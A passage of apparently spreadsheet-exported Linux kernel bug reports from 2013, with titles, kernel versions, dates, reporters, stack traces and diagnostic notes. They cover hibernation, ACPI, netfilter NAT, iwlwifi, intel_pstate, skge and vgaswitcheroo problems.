"PM:%d\n",__LINE__); alloc_normal = 0; alloc_highmem = 0; @@ -1362,12 +1362,13 @@ * current number of saveable pages in memory, allocate page frames for * the image and we're done. */ + printk(KERN_INFO "PM:%d size:%lu, saveable:%lu\n",__LINE__, size, saveable); if (size &gt;= saveable) { pages = preallocate_image_highmem(save_highmem); pages += preallocate_image_memory(saveable - pages, avail_normal); goto out; } - + printk(KERN_INFO "PM:%d\n",__LINE__); /* Estimate the minimum size of the image. */ pages = minimum_image_size(saveable); /* @@ -1400,11 +1401,15 @@ pages_highmem = preallocate_image_highmem(highmem / 2); alloc = (count - max_size) - pages_highmem; pages = preallocate_image_memory(alloc, avail_normal); + printk(KERN_INFO "PM:%d highmem:%lu pages_highmem:%lu\n",__LINE__,highmem, pages_highmem); + printk(KERN_INFO "PM:%d count:%lu max_size:%lu\n",__LINE__,count, max_size); + printk(KERN_INFO "PM:%d pages:%lu alloc:%lu\n",__LINE__,pages, alloc); if (pages &lt; alloc) { /* We have exhausted non-highmem pages, try highmem. */ alloc -= pages; pages += pages_highmem; pages_highmem = preallocate_image_highmem(alloc); + printk(KERN_INFO "PM:%d pages_highmem:%lu\n",__LINE__,pages_highmem); if (pages_highmem &lt; alloc) goto err_out; pages += pages_highmem; And then got the following info in /var/log/messages: Aug 29 11:03:31 debian kernel: [ 174.804982] PM: Syncing filesystems ... done. Aug 29 11:03:32 debian kernel: [ 175.018801] Freezing user space processes ... (elapsed 0.01 seconds) done. Aug 29 11:03:32 debian kernel: [ 175.034689] PM: Preallocating image memory... Aug 29 11:03:32 debian kernel: [ 175.034690] PM:1315 Aug 29 11:03:32 debian kernel: [ 175.034737] PM:1319 Aug 29 11:03:32 debian kernel: [ 175.034781] PM:1323 Aug 29 11:03:32 debian kernel: [ 175.198475] PM:1365 size:488282, saveable:818077 Aug 29 11:03:32 debian kernel: [ 175.198477] PM:1371 Aug 29 11:03:32 debian kernel: [ 175.947178] PM:1404 highmem:3956560 pages_highmem:1978280 Aug 29 11:03:32 debian kernel: [ 175.947180] PM:1405 count:3943404 max_size:1970542 Aug 29 11:03:32 debian kernel: [ 175.947181] PM:1406 pages:118426 alloc:4294961878 Aug 29 11:03:32 debian kernel: [ 185.352026] PM:1412 pages_highmem:1927482 Aug 29 11:03:32 debian kernel: [ 185.352028] Aug 29 11:03:32 debian kernel: [ 185.695000] Restarting tasks ... done. It looks that during computing 'alloc' variable there is overflow: alloc = (3943404 - 1970542) - 1978280 = -5418 (signed) And this function goes to err_out. Best Regards Leon</t>
  </si>
  <si>
    <t>Wrong ACPI handle is detected for Acer V5-573G</t>
  </si>
  <si>
    <t>3.8 and later (3.10.10, 3.11-rc6 still affected)</t>
  </si>
  <si>
    <t>2013-09-01 21:05 UTC</t>
  </si>
  <si>
    <t>2014-01-30 18:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 107381 [details] acpidump for Acer V5-573G (from Felixll) Another "vendor challenges ACPI" bug, this time the Acer V5-573G has an issue where the wrong ACPI handle is detected for the NVIDIA graphics card. Previous related bugs that must be considered when fixing this bug: bug 60561, bug 42696 (Lenovo). Reported at: - Launchpad[1] (lspci, dmidecode, acpidump) - Github[2] [1]: https://bugs.launchpad.net/lpbugreporter/+bug/752542/+attachment/3796348/+files/Acer-Aspire_V5-573G.tar.gz [2]: https://github.com/Bumblebee-Project/Bumblebee/issues/460</t>
  </si>
  <si>
    <t>OOPS at find_appropriate_src+0xdb/0x1a0 [nf_nat]</t>
  </si>
  <si>
    <t>2.6.32.43-0.4-default</t>
  </si>
  <si>
    <t>2013-09-05 03:02 UTC</t>
  </si>
  <si>
    <t>leezhao</t>
  </si>
  <si>
    <t>2013-11-13 15:21 UTC</t>
  </si>
  <si>
    <t>[10542399.515396] BUG: unable to handle kernel NULL pointer dereference at 000000000000003e [10542399.523469] IP: [&lt;ffffffffa1491a4b&gt;] find_appropriate_src+0xdb/0x1a0 [nf_nat] [10542399.530843] PGD 17f55ec067 PUD 17fba37067 PMD 0 [10542399.535727] Oops: 0000 [#1] SMP [10542399.539220] last sysfs file: /sys/devices/system/cpu/cpu23/cache/index2/shared_cpu_map [10542399.547355] CPU 8 [10542399.647544] Supported: Yes, External [10542399.651361] Pid: 0, comm: swapper Tainted: P NX 2.6.32.43-0.4-default #1 Thurley [10542399.659755] RIP: 0010:[&lt;ffffffffa1491a4b&gt;] [&lt;ffffffffa1491a4b&gt;] find_appropriate_src+0xdb/0x1a0 [nf_nat] [10542399.669552] RSP: 0018:ffff88002c3039f0 EFLAGS: 00010286 [10542399.675095] RAX: 0000000000000000 RBX: ffff8817814beb90 RCX: 0000000024852261 [10542399.682454] RDX: 0000000000000000 RSI: 00000000327c4d71 RDI: ffffffff81cd4dc0 [10542399.689812] RBP: ffff88002c303ad0 R08: 0000000000000011 R09: 0000000000000002 [10542399.697170] R10: 0000000000004000 R11: ffffffffa14726e0 R12: ffff88002c303aa0 [10542399.704529] R13: ffff88002c303b40 R14: ffff88002c303b4c R15: ffff88002c303b4e [10542399.711888] FS: 0000000000000000(0000) GS:ffff88002c300000(0000) knlGS:0000000000000000 [10542399.720199] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [10542399.726175] CR2: 000000000000003e CR3: 00000017f67f1000 CR4: 00000000000006e0 [10542399.733534] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [10542399.740893] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [10542399.748254] Process swapper (pid: 0, threadinfo ffff881810db2000, task ffff881810db0080) [10542399.756560] Stack: [10542399.758821] 00000000ffffffff ffff88002c303aa0 ffff88002c303ad0 ffff88002c303b40 [10542399.766301] &lt;0&gt; 0000000000000000 ffff8817f7d639e8 0000000000000100 ffffffffa1491beb [10542399.774237] &lt;0&gt; ffff88002c303ad0 ffff8817f7d639e8 ffff88002c303b40 ffff88002c303aa0 [10542399.782365] Call Trace: [10542399.785085] [&lt;ffffffffa1491beb&gt;] get_unique_tuple+0xdb/0x240 [nf_nat] [10542399.791847] [&lt;ffffffffa1491de9&gt;] nf_nat_setup_info+0x99/0x350 [nf_nat] [10542399.798697] [&lt;ffffffffa149e162&gt;] alloc_null_binding+0x52/0x90 [iptable_nat] [10542399.805977] [&lt;ffffffffa149e519&gt;] nf_nat_fn+0x1e9/0x280 [iptable_nat] [10542399.812654] [&lt;ffffffff81318d18&gt;] nf_iterate+0x68/0xa0 [10542399.818031] [&lt;ffffffff81318db2&gt;] nf_hook_slow+0x62/0xf0 [10542399.823582] [&lt;ffffffff813214a1&gt;] ip_local_deliver+0x51/0x80 [10542399.829477] [&lt;ffffffff81320a59&gt;] ip_rcv_finish+0x1b9/0x440 [10542399.835288] [&lt;ffffffff812f5f89&gt;] netif_receive_skb+0x599/0x6a0 [10542399.841454] [&lt;ffffffffa0ea4837&gt;] ixgbe_clean_rx_irq+0x3d7/0xe50 [ixgbe] [10542399.848397] [&lt;ffffffffa0ea53e4&gt;] ixgbe_clean_rxtx_many+0x134/0x270 [ixgbe] [10542399.855595] [&lt;ffffffff812f6863&gt;] net_rx_action+0xe3/0x1a0 [10542399.861318] [&lt;ffffffff810533ef&gt;] __do_softirq+0xbf/0x170 [10542399.866956] [&lt;ffffffff810040bc&gt;] call_softirq+0x1c/0x30 [10542399.872506] [&lt;ffffffff81005cfd&gt;] do_softirq+0x4d/0x80 [10542399.877883] [&lt;ffffffff81053275&gt;] irq_exit+0x85/0x90 [10542399.883087] [&lt;ffffffff8100525e&gt;] do_IRQ+0x6e/0xe0 [10542399.888120] [&lt;ffffffff81003913&gt;] ret_from_intr+0x0/0xa [10542399.893582] [&lt;ffffffff8100ae42&gt;] mwait_idle+0x62/0x70 [10542399.898957] [&lt;ffffffff8100204a&gt;] cpu_idle+0x5a/0xb0 [10542399.904159] Code: 00 00 00 4d 8d 7d 0e 4d 8d 75 0c 48 89 c3 eb 14 48 8b 03 48 85 c0 0f 84 84 00 00 00 44 0f b6 45 26 48 89 c3 48 8b 53 20 48 8b 03 &lt;44&gt; 38 42 3e 0f 18 08 75 dc 8b 42 18 3b 45 00 75 d4 0f b7 42 28 From the vmcore,we found that: 1 OOPS occured at the statement 't-&gt;dst.protonum == tuple-&gt;dst.protonum' in inline function same_src. 2 The first parameter of same_src "ct" is NULL,The value of 'ct' came from 'ct = nat-&gt;ct'. 3 Read the content of the 'nat', all member's value are zero. static void nf_nat_cleanup_conntrack(struct nf_conn *ct) { struct nf_conn_nat *nat = nf_ct_ext_find(ct, NF_CT_EXT_NAT); if (nat == NULL || nat-&gt;ct == NULL) return; NF_CT_ASSERT(nat-&gt;ct-&gt;status &amp; IPS_NAT_DONE_MASK); spin_lock_bh(&amp;nf_nat_lock); hlist_del_rcu(&amp;nat-&gt;bysource); spin_unlock_bh(&amp;nf_nat_lock); } void nf_conntrack_free(struct nf_conn *ct) { struct net *net = nf_ct_net(ct); nf_ct_ext_destroy(ct); //For NAT，it will call nf_nat_cleanup_conntrack atomic_dec(&amp;net-&gt;ct.count); nf_ct_ext_free(ct); // Free nat-extention memory by kfree; is it possible that the extention was still used in a RCU read side ? kmem_cache_free(net-&gt;ct.nf_conntrack_cachep, ct); }</t>
  </si>
  <si>
    <t>IRQ double-free on acpi pci hotplug suspend/resume</t>
  </si>
  <si>
    <t>2013-09-05 19:34 UTC</t>
  </si>
  <si>
    <t>2013-09-15 04:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 107444 [details] lspci -vvv I have a Dell mini-9 that has been able to suspend and hibernate flawlessly for ages. After an Arch linux kernel upgrade recently these stopped working. It would appear to suspend ok, but would hang when woken. On hibernate it would hang before writing the image. After removing mmc_core.removable=0 from the kernel command line, it would suspend and resume, but dmesg then shows the backtrace pasted in below, where there appears to be an attempt to free and already-freed irq. After this, the sd card reader wouldn't work till a clean reboot. After building many different kernels (my problem appeared after upgrading from 3.10.5 to 3.10.6), and not finding the cause of the problem, I eventually looked at the kernel configs. It turns out the trigger is actually a minor change made in Arch's kernel config: -CONFIG_HOTPLUG_PCI=m +CONFIG_HOTPLUG_PCI=y +CONFIG_HOTPLUG_PCI_ACPI=y +CONFIG_HOTPLUG_PCI_ACPI_IBM=m suspend and hibernate fails when CONFIG_HOTPLUG_PCI_ACPI is set. setting acpiphp.disable=1 solves my problem. This problem is still present in 3.10.10 and 3.11. I was hoping that the patch in #60736 might solve my problem. I've applied it to 3.11, but it still hangs on resume (without acpiphp.disable=1). With that patch an acpiphp.disable=1, it resumes, but on resume there is a message that dbus terminated, and then using systemctl to perform any action returns a message of Failed to get D-Bus connection: Failed to connect to socket /run/systemd/private: Connection refused I'll attach outputs of: lspci -vvv backtrace from dmesg dmidecode acpidump (without the patch from #60736)</t>
  </si>
  <si>
    <t>Excessive console output from acpiphp</t>
  </si>
  <si>
    <t>3.11.0+</t>
  </si>
  <si>
    <t>2013-09-06 15:32 UTC</t>
  </si>
  <si>
    <t>2013-09-15 04:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 107458 [details] dmesg output with Rafael's patches + s/dbg/pr_info/ in hotplug_event() Recent changes to acpiphp result in significantly more console output. On a Lenovo S20 workstation: CONFIG_HOTPLUG_PCI_ACPI=y $ dmesg | wc 5697 49935 384368 $ dmesg | tail --lines=1 [ 53.137123] Ebtables v2.0 registered # CONFIG_HOTPLUG_PCI_ACPI is not set $ dmesg | wc 1053 9176 71652 $dmesg | tail --lines=1 [ 28.917220] Ebtables v2.0 registered This is partially resolved by Rafael's patches: https://lkml.org/lkml/2013/9/6/197 This gets us down to: $ dmesg | wc 2169 19047 152710 $ dmesg | tail --lines=1 [ 39.980918] Ebtables v2.0 registered But we're still getting an extra 1100 lines of output, slowing down the boot by about 10s with acpiphp enabled. The extra output is almost entirely from repeated bus scans caused by device checks on the root ports: $ dmesg | colrm 1 15 | sort | uniq -c | sort -nr | head --lines=25 73 pci 0000:00:1f.0: BAR 13: [io 0x1000-0x107f] has bogus alignment 73 pci 0000:00:1e.0: PCI bridge to [bus 06] 64 pci 0000:00:1e.0: bridge window [mem 0x81100000-0x812fffff 64bit pref] 64 pci 0000:00:1e.0: bridge window [mem 0x80f00000-0x810fffff] 64 pci 0000:00:1e.0: bridge window [io 0x7000-0x7fff] 38 pci 0000:00:1c.4: PCI bridge to [bus 05] 38 pci 0000:00:1c.4: bridge window [mem 0xf4f00000-0xf4ffffff] 38 pci 0000:00:1c.0: PCI bridge to [bus 04] 38 pci 0000:00:07.0: PCI bridge to [bus 03] 38 pci 0000:00:07.0: bridge window [mem 0xf2000000-0xf40fffff] 38 pci 0000:00:07.0: bridge window [mem 0xe0000000-0xf1ffffff 64bit pref] 38 pci 0000:00:07.0: bridge window [io 0x4000-0x4fff] 38 pci 0000:00:03.0: PCI bridge to [bus 02] 38 pci 0000:00:03.0: bridge window [mem 0xf4e00000-0xf4efffff] 38 pci 0000:00:03.0: bridge window [mem 0xd0000000-0xdfffffff 64bit pref] 38 pci 0000:00:03.0: bridge window [io 0x3000-0x3fff] 38 pci 0000:00:01.0: PCI bridge to [bus 01] 38 pci 0000:00:01.0: bridge window [mem 0xf4100000-0xf4bfffff] 38 pci 0000:00:01.0: bridge window [io 0x2000-0x2fff] 37 pci 0000:00:1c.4: bridge window [mem 0x80c00000-0x80dfffff 64bit pref] 37 pci 0000:00:1c.4: bridge window [io 0x6000-0x6fff] 37 pci 0000:00:1c.0: bridge window [mem 0x80a00000-0x80bfffff 64bit pref] 37 pci 0000:00:1c.0: bridge window [mem 0x80800000-0x809fffff] 37 pci 0000:00:1c.0: bridge window [io 0x5000-0x5fff] 36 pci 0000:00:01.0: bridge window [mem 0x80000000-0x807fffff 64bit pref] Converting 'dbg' to 'pr_info' in hotplug_event(), we see this: $ dmesg | grep "check notify" [ 1.633228] hotplug_event: Device check notify on \_SB_.PCI0.PEX2 [ 2.472004] hotplug_event: Device check notify on \_SB_.PCI0.PEX3 [ 2.477288] hotplug_event: Device check notify on \_SB_.PCI0.PEX4 [ 2.482571] hotplug_event: Device check notify on \_SB_.PCI0.PEX5 [ 2.482579] hotplug_event: Device check notify on \_SB_.PCI0.PEX6 [ 8.204953] hotplug_event: Device check notify on \_SB_.PCI0.PEX2 [ 8.209632] hotplug_event: Device check notify on \_SB_.PCI0.PEX3 [ 8.214272] hotplug_event: Device check notify on \_SB_.PCI0.PEX4 [ 8.218894] hotplug_event: Device check notify on \_SB_.PCI0.PEX5 [ 8.218901] hotplug_event: Device check notify on \_SB_.PCI0.PEX6</t>
  </si>
  <si>
    <t>iwlwifi: Warning in iwl_mvm_tx_skb</t>
  </si>
  <si>
    <t>2013-09-08 04:55 UTC</t>
  </si>
  <si>
    <t>Jan Oravec</t>
  </si>
  <si>
    <t>2013-12-10 07:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 107501 [details] .config I have a Wireless-AC 7260 card (8086:08b1) configured in AP mode using hostapd and the machine hits this warning few hours after boot: [ 7044.024827] ------------[ cut here ]------------ [ 7044.024839] WARNING: CPU: 3 PID: 1104 at drivers/net/wireless/iwlwifi/mvm/tx.c:403 iwl_mvm_tx_skb+0x380/0x390() [ 7044.024844] CPU: 3 PID: 1104 Comm: irq/44-iwlwifi Not tainted 3.11.0-gentoo #1 [ 7044.024845] Hardware name: Gigabyte Technology Co., Ltd. To be filled by O.E.M./H77N-WIFI, BIOS F2 08/23/2012 [ 7044.024848] 0000000000000000 ffffffff81aee590 ffffffff818c9363 0000000000000000 [ 7044.024852] ffffffff8108aebd ffff88020a522598 ffff88021570c200 ffff880215740426 [ 7044.024855] ffff880205d7ea80 ffff880214efb710 ffffffff8150a410 ffff88021574042e [ 7044.024858] Call Trace: [ 7044.024860] &lt;IRQ&gt; [&lt;ffffffff818c9363&gt;] ? dump_stack+0x50/0x80 [ 7044.024870] [&lt;ffffffff8108aebd&gt;] ? warn_slowpath_common+0x7d/0xb0 [ 7044.024874] [&lt;ffffffff8150a410&gt;] ? iwl_mvm_tx_skb+0x380/0x390 [ 7044.024879] [&lt;ffffffff8188fb14&gt;] ? ieee80211_crypto_ccmp_encrypt+0x34/0x50 [ 7044.024882] [&lt;ffffffff81504eea&gt;] ? iwl_mvm_mac_tx+0x6a/0xa0 [ 7044.024886] [&lt;ffffffff818a69f3&gt;] ? __ieee80211_tx+0x123/0x380 [ 7044.024889] [&lt;ffffffff818a85e8&gt;] ? ieee80211_tx+0xf8/0x130 [ 7044.024893] [&lt;ffffffff818a97da&gt;] ? ieee80211_tx_pending+0x9a/0x210 [ 7044.024897] [&lt;ffffffff810e260e&gt;] ? handle_irq_event_percpu+0x7e/0x140 [ 7044.024901] [&lt;ffffffff8108e95a&gt;] ? tasklet_action+0x5a/0xc0 [ 7044.024904] [&lt;ffffffff8108ef78&gt;] ? __do_softirq+0xc8/0x190 [ 7044.024909] [&lt;ffffffff818d383c&gt;] ? call_softirq+0x1c/0x30 [ 7044.024910] &lt;EOI&gt; [&lt;ffffffff81039d2d&gt;] ? do_softirq+0x4d/0x80 [ 7044.024919] [&lt;ffffffff8108edf5&gt;] ? local_bh_enable+0xa5/0xb0 [ 7044.024922] [&lt;ffffffff8150945b&gt;] ? iwl_mvm_rx_rx_mpdu+0x36b/0x4a0 [ 7044.024927] [&lt;ffffffff814e5f59&gt;] ? iwl_pcie_irq_handler+0x589/0x9b0 [ 7044.024930] [&lt;ffffffff810e49f2&gt;] ? note_interrupt+0x42/0x220 [ 7044.024934] [&lt;ffffffff810e2da0&gt;] ? irq_thread_dtor+0xb0/0xb0 [ 7044.024936] [&lt;ffffffff810e2dbe&gt;] ? irq_thread_fn+0x1e/0x50 [ 7044.024939] [&lt;ffffffff810e2bc3&gt;] ? irq_thread+0x113/0x140 [ 7044.024942] [&lt;ffffffff810e2cf0&gt;] ? irq_finalize_oneshot.part.37+0x100/0x100 [ 7044.024945] [&lt;ffffffff810e2ab0&gt;] ? wake_threads_waitq+0x50/0x50 [ 7044.024948] [&lt;ffffffff810a7133&gt;] ? kthread+0xb3/0xc0 [ 7044.024952] [&lt;ffffffff810a0000&gt;] ? put_unbound_pool+0x100/0x160 [ 7044.024955] [&lt;ffffffff810a7080&gt;] ? __kthread_parkme+0x80/0x80 [ 7044.024959] [&lt;ffffffff818d242c&gt;] ? ret_from_fork+0x7c/0xb0 [ 7044.024962] [&lt;ffffffff810a7080&gt;] ? __kthread_parkme+0x80/0x80 [ 7044.024964] ---[ end trace 7d3da46b20dd5d6d ]--- Disassembling iwl_mvm_tx_skb shows that iwlwifi is hitting this warning: if (is_ampdu) { if (WARN_ON_ONCE(mvmsta-&gt;tid_data[tid].state != IWL_AGG_ON)) goto drop_unlock_sta; txq_id = mvmsta-&gt;tid_data[tid].txq_id; } The kernel log also contains warnings like this (on average, one warning per hour): [ 64.004463] iwlwifi 0000:04:00.0: Failed to allocate agg queue [ 9682.747639] iwlwifi 0000:04:00.0: Failed to allocate agg queue [ 9698.199465] iwlwifi 0000:04:00.0: Failed to allocate agg queue [ 9702.093211] iwlwifi 0000:04:00.0: Failed to allocate agg queue [ 9720.898143] iwlwifi 0000:04:00.0: Failed to allocate agg queue The above happens with both 3.11-rc4 (vanilla) and final 3.11 (with gentoo patches). With 3.11-rc4, the AP also stops working after a few hours (no correlation with timing of any of the warnings above) -- the clients could still authenticate, AP sees packets from clients, but clients do not receive packets from AP. I just upgraded to 3.11 and did not experience the bug yet, but it's likely the problem still exists as there were no iwlwifi changes between 3.11-rc4 and 3.11.</t>
  </si>
  <si>
    <t>Backlight off (set to lowest level) on boot</t>
  </si>
  <si>
    <t>2013-09-12 10:01 UTC</t>
  </si>
  <si>
    <t>erno</t>
  </si>
  <si>
    <t>2013-11-15 06:11 UTC</t>
  </si>
  <si>
    <t>The hardware is Acer Aspire V5-573G with Intel (Haswell) video + Nvidia GPU. I can increase brightness normally with the keyboard fn + arrow keys. Happened on the stock kernel from Ubuntu 13.10 Beta and the latest mainline kernel from ubuntu kernel-ppa: linux-image-3.11.0-999. -generic_3.11.0-999.201309110406_amd64.deb The brightness levels show up correctly under /sys/class/backlight/acpi_video0 and respond to the brightness controls so it's using the acpi video driver. Another using reporting same problem: http://www.linuxquestions.org/questions/linux-newbie-8/black-screen-when-trying-to-install-linux-on-acer-aspire-v5-573g-4175472954/</t>
  </si>
  <si>
    <t>CPU frequency is stuck after suspend/resume using the intel_pstate driver on a Sandy Bridge CPU</t>
  </si>
  <si>
    <t>3.11.0</t>
  </si>
  <si>
    <t>2013-09-12 12:18 UTC</t>
  </si>
  <si>
    <t>Patrick Bartels</t>
  </si>
  <si>
    <t>2013-11-04 05:44 UTC</t>
  </si>
  <si>
    <t>Hi there, I have a ThinkPad X220 with a i7-2640M Sandy Bridge CPU and a serious problem with the intel_pstate driver. After booting up, everthing is fine. I use the powersave governor and run the following commands to throttle the CPU a bit and keep the machine cool and quiet: root /sys/devices/system/cpu/intel_pstate # echo 70 &gt; max_perf_pct root /sys/devices/system/cpu/intel_pstate # echo 0 &gt; min_perf_pct root /sys/devices/system/cpu/intel_pstate # echo 1 &gt; no_turbo root /sys/devices/system/cpu/intel_pstate # cat * 70 0 1 After suspending and resuming the CPU is stuck at 800 MHz and the frequency simply won't go up. The whole machine is significantly slower. Trying to run the same commands as above results in this: root /sys/devices/system/cpu/intel_pstate # echo 70 &gt; max_perf_pct root /sys/devices/system/cpu/intel_pstate # echo 0 &gt; min_perf_pct root /sys/devices/system/cpu/intel_pstate # echo 1 &gt; no_turbo root /sys/devices/system/cpu/intel_pstate # cat * 31 0 1 There's simply no way I can get everything back to normal unless I do a reboot. Is there any chance that this could be fixed in the next kernel version? Thanks in advance.</t>
  </si>
  <si>
    <t>[BISECTED] - Recent commits against skge.c render ethernet broken</t>
  </si>
  <si>
    <t>3.11.1</t>
  </si>
  <si>
    <t>2013-09-14 16:35 UTC</t>
  </si>
  <si>
    <t>da_audiophile</t>
  </si>
  <si>
    <t>2013-11-15 18:57 UTC</t>
  </si>
  <si>
    <t>Linux kernel v3.11.1 gives me a partially functional network on hardware using the skge driver. I am running Arch Linux i686. I do not see anything obvious in the dmesg output to indicate that a problem exists. I am happy to supply any additional info to help you further diagnose this issue. Attachments: *proposed patch to fix problem Bug fix: Reverting the last 3 commits against drivers/net/ethernet/marvell/skge.c which is contained in the attached patch fixes the issue. I do not know which of the 3 caused the problem; I am not a programmer/developer. More info: in the bug state (i.e. using the unmodified 3.11.1 source): What works: *Netctl successfully bring up the interface *I can ping internal IP addresses *I can resolve domain names; wget can start a download from the AUR (aur.archlinux.org gets resolved to a numerical IP but the download never starts). What doesn't work: *I cannot ping external addresses (names or numerical) *I cannot ssh out or into the box *I cannot receive data via wget which just hangs indefinitely. dmesg | grep skge [ 6.020443] skge: 1.14 addr 0xd5000000 irq 17 chip Yukon-Lite rev 7 [ 6.020977] skge 0000:01:04.0 eth0: addr 00:0e:a6:70:b8:12 [ 9.009004] skge 0000:01:04.0 enp1s4: enabling interface [ 11.906824] skge 0000:01:04.0 enp1s4: Link is up at 1000 Mbps, full duplex, flow control both [ 12.093470] skge 0000:01:04.0 enp1s4: disabling interface [ 12.095851] skge 0000:01:04.0 enp1s4: enabling interface [ 15.733743] skge 0000:01:04.0 enp1s4: Link is up at 1000 Mbps, full duplex, flow control both</t>
  </si>
  <si>
    <t>unable to create an ad-hoc using iwconfig</t>
  </si>
  <si>
    <t>3.11, 3.12-rc1</t>
  </si>
  <si>
    <t>2013-09-17 12:40 UTC</t>
  </si>
  <si>
    <t>vladi</t>
  </si>
  <si>
    <t>2014-03-19 11:58 UTC</t>
  </si>
  <si>
    <t>[ 176.662993] wlp3s0: Creating new IBSS network, BSSID 5e:40:22:a2:ea:64 [ 176.669042] ------------[ cut here ]------------ [ 176.669065] WARNING: CPU: 1 PID: 47 at net/wireless/chan.c:373 cfg80211_chandef_usable+0x30/0x15f [cfg80211]() [ 176.669067] Modules linked in: e1000e ptp pps_core ipt_MASQUERADE iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack ip_tables x_tables cdc_ether usbnet mii cdc_wdm cdc_acm btusb bluetooth dm_mod uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev tcp_bic arc4 iwldvm mac80211 iwlwifi snd_hda_codec_conexant cfg80211 pcspkr ehci_pci snd_hda_intel snd_hda_codec snd_hwdep snd_pcm uhci_hcd snd_page_alloc snd_timer ehci_hcd snd soundcore [ 176.669116] CPU: 1 PID: 47 Comm: kworker/u4:5 Tainted: G W 3.12.0-rc1 #15 [ 176.669119] Hardware name: LENOVO 2777CTO/2777CTO, BIOS 6EET47WW (3.07 ) 10/13/2009 [ 176.669131] Workqueue: phy0 ieee80211_iface_work [mac80211] [ 176.669134] 0000000000000000 0000000000000009 ffffffff813d534d 0000000000000000 [ 176.669139] ffffffff81031d84 ffff8800b7700780 ffffffffa00c9e8c 0000000000000002 [ 176.669144] 000000000000000f ffff880135cb1dc2 ffff880135cb1d50 ffff8800b75b8200 [ 176.669149] Call Trace: [ 176.669157] [&lt;ffffffff813d534d&gt;] ? dump_stack+0x50/0x80 [ 176.669164] [&lt;ffffffff81031d84&gt;] ? warn_slowpath_common+0x73/0x8b [ 176.669174] [&lt;ffffffffa00c9e8c&gt;] ? cfg80211_chandef_usable+0x30/0x15f [cfg80211] [ 176.669184] [&lt;ffffffffa00c9e8c&gt;] ? cfg80211_chandef_usable+0x30/0x15f [cfg80211] [ 176.669196] [&lt;ffffffffa0117256&gt;] ? __ieee80211_sta_join_ibss+0x162/0x6e2 [mac80211] [ 176.669201] [&lt;ffffffff813d2792&gt;] ? printk+0x4f/0x54 [ 176.669213] [&lt;ffffffffa0117a61&gt;] ? ieee80211_sta_create_ibss+0xc8/0xce [mac80211] [ 176.669225] [&lt;ffffffffa0118815&gt;] ? ieee80211_ibss_work+0x255/0x3c5 [mac80211] [ 176.669231] [&lt;ffffffff81043ee9&gt;] ? process_one_work+0x1c7/0x2e6 [ 176.669236] [&lt;ffffffff81041e98&gt;] ? pwq_activate_delayed_work+0x1e/0x28 [ 176.669241] [&lt;ffffffff81044454&gt;] ? worker_thread+0x1cb/0x2c4 [ 176.669245] [&lt;ffffffff81044289&gt;] ? rescuer_thread+0x25c/0x25c [ 176.669251] [&lt;ffffffff81048cb3&gt;] ? kthread+0xad/0xb5 [ 176.669256] [&lt;ffffffff81040000&gt;] ? sys_geteuid+0x1f/0x22 [ 176.669261] [&lt;ffffffff81048c06&gt;] ? kthread_freezable_should_stop+0x3b/0x3b [ 176.669266] [&lt;ffffffff813da3ec&gt;] ? ret_from_fork+0x7c/0xb0 [ 176.669271] [&lt;ffffffff81048c06&gt;] ? kthread_freezable_should_stop+0x3b/0x3b [ 176.669274] ---[ end trace 11f04ac11c3468f4 ]--- [ 176.669277] wlp3s0: Failed to join IBSS, beacons forbidden</t>
  </si>
  <si>
    <t>Kernel panic on starting MythTV with Haupauge USB stick</t>
  </si>
  <si>
    <t>3.10-2-amd64</t>
  </si>
  <si>
    <t>2013-09-18 08:39 UTC</t>
  </si>
  <si>
    <t>Johannes Rohr</t>
  </si>
  <si>
    <t>2013-11-13 14:52 UTC</t>
  </si>
  <si>
    <t>Details of this bug are at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=719623 Please go down to the second follow-up message for a backtrace generated with kdump-tools. I could still reproduce the bug with Kernel 3.11. In a followup message, a developer proposes a patch which I have tested locally and which prevents the kernel panic from occuring. I'd be extremely happy if this could be addressed and I'd be more than happy to provide additional debugging information, backtraces or whatever is required. Thanks so much in advance!</t>
  </si>
  <si>
    <t>Userspace memory corruption after suspemd-to-RAM - Bisected to: 1c441e9 "epoll: use freezable blocking call"</t>
  </si>
  <si>
    <t>2013-09-21 06:55 UTC</t>
  </si>
  <si>
    <t>Natrio</t>
  </si>
  <si>
    <t>2013-11-07 06:04 UTC</t>
  </si>
  <si>
    <t>Systemd-207 receives SEGV after waking up from suspemd-to-RAM on many different machines. Maintainer says that the cause of memory corruption by Linux-3.11 kernel. Rolling back to kernel 3.10 solves the problem. Links: https://bugs.archlinux.org/task/36991#comment114444 https://bbs.archlinux.org/viewtopic.php?pid=1326769 https://bbs.archlinux.de/viewtopic.php?pid=311974</t>
  </si>
  <si>
    <t>Cannot switch off Radeon 6400M with vgaswitcheroo</t>
  </si>
  <si>
    <t>3.12-rc1</t>
  </si>
  <si>
    <t>2013-09-22 14:36 UTC</t>
  </si>
  <si>
    <t>madcatx</t>
  </si>
  <si>
    <t>2015-07-21 17:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 109251 [details] dmesg I use systemd's tmpfiles to power off the Radeon DIS early during boot to save power. This works fine with kernel 3.11.1 but it breaks with 3.12-rc1. I removed the systemd rule and tried to power the card off manually (echo OFF &gt; /sys/kernel/debug/vgaswitcheroo/switch). I got a kernel warning and vga_switcheroo died. See the attached file for full dmesg dump.</t>
  </si>
  <si>
    <t>kernel BUG at mm/vmalloc.c:320</t>
  </si>
  <si>
    <t>3.10.12</t>
  </si>
  <si>
    <t>2013-10-03 08:38 UTC</t>
  </si>
  <si>
    <t>Anatoly Muliarski</t>
  </si>
  <si>
    <t>2013-11-13 14:18 UTC</t>
  </si>
  <si>
